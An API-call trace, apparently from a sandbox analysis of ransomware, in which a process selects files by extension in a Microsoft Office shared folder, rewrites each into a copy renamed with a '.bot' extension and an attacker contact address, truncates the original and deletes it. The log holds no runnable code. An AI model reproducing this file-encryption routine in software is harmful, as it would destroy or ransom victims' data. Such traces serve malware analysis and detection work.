	[0035.603] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.603] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.603] lstrlenW (lpString=".jpg") returned 4
	[0035.603] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.603] lstrcmpiW (lpString1=".EPS", lpString2=".bot") returned 1
	[0035.603] lstrlenW (lpString="MS.EPS") returned 6
	[0035.603] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0035.605] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=15067) returned 1
	[0035.605] CloseHandle (hObject=0x18c) returned 1
	[0035.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps")) returned 0x20
	[0035.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.605] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0035.605] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.605] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.605] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0035.605] GetLastError () returned 0x0
	[0035.605] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x3adb, lpOverlapped=0x0) returned 1
	[0035.607] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x3ae0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x3ae0, lpOverlapped=0x0) returned 1
	[0035.608] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.608] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0035.608] SetEndOfFile (hFile=0x180) returned 1
	[0035.608] CloseHandle (hObject=0x180) returned 1
	[0035.609] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.609] SetEndOfFile (hFile=0x18c) returned 1
	[0035.610] CloseHandle (hObject=0x18c) returned 1
	[0035.610] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0035.610] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps")) returned 1
	[0035.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61
	[0035.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61
	[0035.610] lstrlenW (lpString=".doc") returned 4
	[0035.610] lstrcmpiW (lpString1=".doc", lpString2=".EPS") returned -1
	[0035.610] lstrlenW (lpString=".docx") returned 5
	[0035.611] lstrcmpiW (lpString1=".docx", lpString2="S.EPS") returned -1
	[0035.611] lstrlenW (lpString=".pdf") returned 4
	[0035.611] lstrcmpiW (lpString1=".pdf", lpString2=".EPS") returned 1
	[0035.611] lstrlenW (lpString=".xls") returned 4
	[0035.611] lstrcmpiW (lpString1=".xls", lpString2=".EPS") returned 1
	[0035.611] lstrlenW (lpString=".xlsx") returned 5
	[0035.611] lstrcmpiW (lpString1=".xlsx", lpString2="S.EPS") returned -1
	[0035.611] lstrlenW (lpString=".ppt") returned 4
	[0035.611] lstrcmpiW (lpString1=".ppt", lpString2=".EPS") returned 1
	[0035.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61
	[0035.611] lstrlenW (lpString=".zip") returned 4
	[0035.611] lstrcmpiW (lpString1=".zip", lpString2=".EPS") returned 1
	[0035.611] lstrlenW (lpString=".rar") returned 4
	[0035.611] lstrcmpiW (lpString1=".rar", lpString2=".EPS") returned 1
	[0035.611] lstrlenW (lpString=".bz2") returned 4
	[0035.611] lstrcmpiW (lpString1=".bz2", lpString2=".EPS") returned -1
	[0035.611] lstrlenW (lpString=".7z") returned 3
	[0035.611] lstrcmpiW (lpString1=".7z", lpString2="EPS") returned -1
	[0035.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61
	[0035.611] lstrlenW (lpString=".dbf") returned 4
	[0035.611] lstrcmpiW (lpString1=".dbf", lpString2=".EPS") returned -1
	[0035.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61
	[0035.611] lstrlenW (lpString=".1cd") returned 4
	[0035.611] lstrcmpiW (lpString1=".1cd", lpString2=".EPS") returned -1
	[0035.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61
	[0035.611] lstrlenW (lpString=".jpg") returned 4
	[0035.611] lstrcmpiW (lpString1=".jpg", lpString2=".EPS") returned 1
	[0035.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61
	[0035.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61
	[0035.611] lstrlenW (lpString=".doc") returned 4
	[0035.611] lstrcmpiW (lpString1=".doc", lpString2=".EPS") returned -1
	[0035.611] lstrlenW (lpString=".docx") returned 5
	[0035.611] lstrcmpiW (lpString1=".docx", lpString2="S.EPS") returned -1
	[0035.611] lstrlenW (lpString=".pdf") returned 4
	[0035.611] lstrcmpiW (lpString1=".pdf", lpString2=".EPS") returned 1
	[0035.612] lstrlenW (lpString=".xls") returned 4
	[0035.612] lstrcmpiW (lpString1=".xls", lpString2=".EPS") returned 1
	[0035.612] lstrlenW (lpString=".xlsx") returned 5
	[0035.612] lstrcmpiW (lpString1=".xlsx", lpString2="S.EPS") returned -1
	[0035.612] lstrlenW (lpString=".ppt") returned 4
	[0035.612] lstrcmpiW (lpString1=".ppt", lpString2=".EPS") returned 1
	[0035.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61
	[0035.612] lstrlenW (lpString=".zip") returned 4
	[0035.612] lstrcmpiW (lpString1=".zip", lpString2=".EPS") returned 1
	[0035.612] lstrlenW (lpString=".rar") returned 4
	[0035.612] lstrcmpiW (lpString1=".rar", lpString2=".EPS") returned 1
	[0035.612] lstrlenW (lpString=".bz2") returned 4
	[0035.612] lstrcmpiW (lpString1=".bz2", lpString2=".EPS") returned -1
	[0035.612] lstrlenW (lpString=".7z") returned 3
	[0035.612] lstrcmpiW (lpString1=".7z", lpString2="EPS") returned -1
	[0035.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61
	[0035.612] lstrlenW (lpString=".dbf") returned 4
	[0035.612] lstrcmpiW (lpString1=".dbf", lpString2=".EPS") returned -1
	[0035.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61
	[0035.612] lstrlenW (lpString=".1cd") returned 4
	[0035.612] lstrcmpiW (lpString1=".1cd", lpString2=".EPS") returned -1
	[0035.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61
	[0035.612] lstrlenW (lpString=".jpg") returned 4
	[0035.612] lstrcmpiW (lpString1=".jpg", lpString2=".EPS") returned 1
	[0035.612] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0035.612] lstrlenW (lpString="MS.GIF") returned 6
	[0035.612] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0035.613] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1069) returned 1
	[0035.613] CloseHandle (hObject=0x18c) returned 1
	[0035.613] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif")) returned 0x20
	[0035.613] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.613] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0035.613] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.613] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.613] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0035.613] GetLastError () returned 0x0
	[0035.613] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x42d, lpOverlapped=0x0) returned 1
	[0035.615] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x430, lpOverlapped=0x0) returned 1
	[0035.616] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.616] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0035.616] SetEndOfFile (hFile=0x180) returned 1
	[0035.616] CloseHandle (hObject=0x180) returned 1
	[0035.618] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.618] SetEndOfFile (hFile=0x18c) returned 1
	[0035.619] CloseHandle (hObject=0x18c) returned 1
	[0035.619] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0035.620] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif")) returned 1
	[0035.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61
	[0035.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61
	[0035.620] lstrlenW (lpString=".doc") returned 4
	[0035.620] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0035.620] lstrlenW (lpString=".docx") returned 5
	[0035.620] lstrcmpiW (lpString1=".docx", lpString2="S.GIF") returned -1
	[0035.620] lstrlenW (lpString=".pdf") returned 4
	[0035.620] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0035.620] lstrlenW (lpString=".xls") returned 4
	[0035.620] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0035.620] lstrlenW (lpString=".xlsx") returned 5
	[0035.620] lstrcmpiW (lpString1=".xlsx", lpString2="S.GIF") returned -1
	[0035.620] lstrlenW (lpString=".ppt") returned 4
	[0035.620] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0035.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61
	[0035.620] lstrlenW (lpString=".zip") returned 4
	[0035.620] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0035.620] lstrlenW (lpString=".rar") returned 4
	[0035.620] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0035.620] lstrlenW (lpString=".bz2") returned 4
	[0035.620] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0035.620] lstrlenW (lpString=".7z") returned 3
	[0035.621] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0035.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61
	[0035.621] lstrlenW (lpString=".dbf") returned 4
	[0035.621] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0035.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61
	[0035.621] lstrlenW (lpString=".1cd") returned 4
	[0035.621] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0035.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61
	[0035.621] lstrlenW (lpString=".jpg") returned 4
	[0035.621] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0035.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61
	[0035.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61
	[0035.621] lstrlenW (lpString=".doc") returned 4
	[0035.621] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0035.621] lstrlenW (lpString=".docx") returned 5
	[0035.621] lstrcmpiW (lpString1=".docx", lpString2="S.GIF") returned -1
	[0035.621] lstrlenW (lpString=".pdf") returned 4
	[0035.621] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0035.621] lstrlenW (lpString=".xls") returned 4
	[0035.621] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0035.621] lstrlenW (lpString=".xlsx") returned 5
	[0035.621] lstrcmpiW (lpString1=".xlsx", lpString2="S.GIF") returned -1
	[0035.621] lstrlenW (lpString=".ppt") returned 4
	[0035.621] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0035.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61
	[0035.621] lstrlenW (lpString=".zip") returned 4
	[0035.621] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0035.621] lstrlenW (lpString=".rar") returned 4
	[0035.621] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0035.621] lstrlenW (lpString=".bz2") returned 4
	[0035.621] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0035.622] lstrlenW (lpString=".7z") returned 3
	[0035.622] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0035.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61
	[0035.622] lstrlenW (lpString=".dbf") returned 4
	[0035.622] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0035.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61
	[0035.622] lstrlenW (lpString=".1cd") returned 4
	[0035.622] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0035.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61
	[0035.622] lstrlenW (lpString=".jpg") returned 4
	[0035.622] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0035.622] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0035.622] lstrlenW (lpString="MS.JPG") returned 6
	[0035.622] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0035.623] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1061) returned 1
	[0035.623] CloseHandle (hObject=0x18c) returned 1
	[0035.623] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg")) returned 0x20
	[0035.623] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.623] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0035.623] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.623] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.623] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0035.623] GetLastError () returned 0x0
	[0035.624] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x425, lpOverlapped=0x0) returned 1
	[0035.625] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x430, lpOverlapped=0x0) returned 1
	[0035.626] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.626] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0035.626] SetEndOfFile (hFile=0x180) returned 1
	[0035.626] CloseHandle (hObject=0x180) returned 1
	[0035.627] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.627] SetEndOfFile (hFile=0x18c) returned 1
	[0035.628] CloseHandle (hObject=0x18c) returned 1
	[0035.628] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0035.628] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg")) returned 1
	[0035.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61
	[0035.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61
	[0035.628] lstrlenW (lpString=".doc") returned 4
	[0035.628] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0035.628] lstrlenW (lpString=".docx") returned 5
	[0035.628] lstrcmpiW (lpString1=".docx", lpString2="S.JPG") returned -1
	[0035.628] lstrlenW (lpString=".pdf") returned 4
	[0035.628] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0035.628] lstrlenW (lpString=".xls") returned 4
	[0035.629] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0035.629] lstrlenW (lpString=".xlsx") returned 5
	[0035.629] lstrcmpiW (lpString1=".xlsx", lpString2="S.JPG") returned -1
	[0035.629] lstrlenW (lpString=".ppt") returned 4
	[0035.629] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0035.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61
	[0035.629] lstrlenW (lpString=".zip") returned 4
	[0035.629] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0035.629] lstrlenW (lpString=".rar") returned 4
	[0035.629] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0035.629] lstrlenW (lpString=".bz2") returned 4
	[0035.629] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0035.629] lstrlenW (lpString=".7z") returned 3
	[0035.629] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0035.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61
	[0035.629] lstrlenW (lpString=".dbf") returned 4
	[0035.629] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0035.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61
	[0035.629] lstrlenW (lpString=".1cd") returned 4
	[0035.629] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0035.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61
	[0035.629] lstrlenW (lpString=".jpg") returned 4
	[0035.629] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0035.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61
	[0035.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61
	[0035.630] lstrlenW (lpString=".doc") returned 4
	[0035.630] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0035.630] lstrlenW (lpString=".docx") returned 5
	[0035.630] lstrcmpiW (lpString1=".docx", lpString2="S.JPG") returned -1
	[0035.630] lstrlenW (lpString=".pdf") returned 4
	[0035.630] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0035.630] lstrlenW (lpString=".xls") returned 4
	[0035.630] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0035.630] lstrlenW (lpString=".xlsx") returned 5
	[0035.630] lstrcmpiW (lpString1=".xlsx", lpString2="S.JPG") returned -1
	[0035.630] lstrlenW (lpString=".ppt") returned 4
	[0035.630] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0035.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61
	[0035.630] lstrlenW (lpString=".zip") returned 4
	[0035.630] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0035.630] lstrlenW (lpString=".rar") returned 4
	[0035.630] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0035.630] lstrlenW (lpString=".bz2") returned 4
	[0035.630] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0035.630] lstrlenW (lpString=".7z") returned 3
	[0035.630] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0035.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61
	[0035.630] lstrlenW (lpString=".dbf") returned 4
	[0035.630] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0035.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61
	[0035.630] lstrlenW (lpString=".1cd") returned 4
	[0035.631] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0035.631] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61
	[0035.631] lstrlenW (lpString=".jpg") returned 4
	[0035.631] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0035.631] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0035.631] lstrlenW (lpString="MS.PNG") returned 6
	[0035.631] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
